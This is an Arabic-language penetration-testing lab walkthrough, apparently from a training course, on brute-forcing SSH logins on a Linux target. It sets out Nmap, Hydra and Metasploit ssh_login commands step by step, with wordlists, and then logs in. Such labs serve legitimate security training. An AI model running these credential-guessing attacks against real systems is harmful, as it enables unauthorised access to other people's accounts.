🧪 المختبر 14: هجوم القوة الغاشمة (Brute-Force) على خادم SSH في Linux (باستخدام Hydra و Metasplo

  1. الفحص واكتشاف خدمة SSH:

    • قم بإجراء فحص Nmap على الهدف لتحديد ما إذا كانت خدمة SSH تعمل على المنفذ 22.

    • الأمر:

      nmap -sV <Target_IP>
    • الشرح: ستجد خدمة OpenSSH تعمل على المنفذ 22.

  2. هجوم القوة الغاشمة على SSH (باستخدام Hydra):

    • الأمر الأساسي:

      hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/common_passwords.txt <Target_IP> ssh
    • الشرح:ستبدأ Hydra في تجربة مجموعات مختلفة من أسماء المستخدمين وكلمات المرور. ستظهر لك بيانات الاعتماد الصالحة باللون الأخضر.

  3. هجوم القوة الغاشمة على SSH (باستخدام Metasploit):

    • ابدأ خدمة قاعدة بيانات PostgreSQL ثم قم بتشغيل Metasploit Console.

    • الأمر:

      msfconsole -q
    • المعلومة الذهبية 💡: استخدم وحدة auxiliary/scanner/ssh/ssh_login لتخمين بيانات اعتماد SSH.

    • الأمر:

      use auxiliary/scanner/ssh/ssh_login
      show options
      set RHOSTS <Target_IP>
      set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
      set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
      set STOP_ON_SUCCESS true
      set VERBOSE true
      exploit
    • الشرح: إذا نفذت هذه الأوامر، ستبدأ الوحدة في تجربة مجموعات مختلفة من بيانات الاعتماد وستعرض لك بيانات الاعتماد الصالحة التي تم العثور عليها.

  4. تسجيل الدخول إلى SSH:

    • بمجرد العثور على بيانات اعتماد صالحة، استخدم عميل SSH لتسجيل الدخول.

    • الأمر:

      ssh sysadmin@<Target_IP>
    • الشرح:سيطلب منك كلمة المرور. إذا أدخلتها بشكل صحيح، ستسجل الدخول إلى نظام الهدف.

Last updated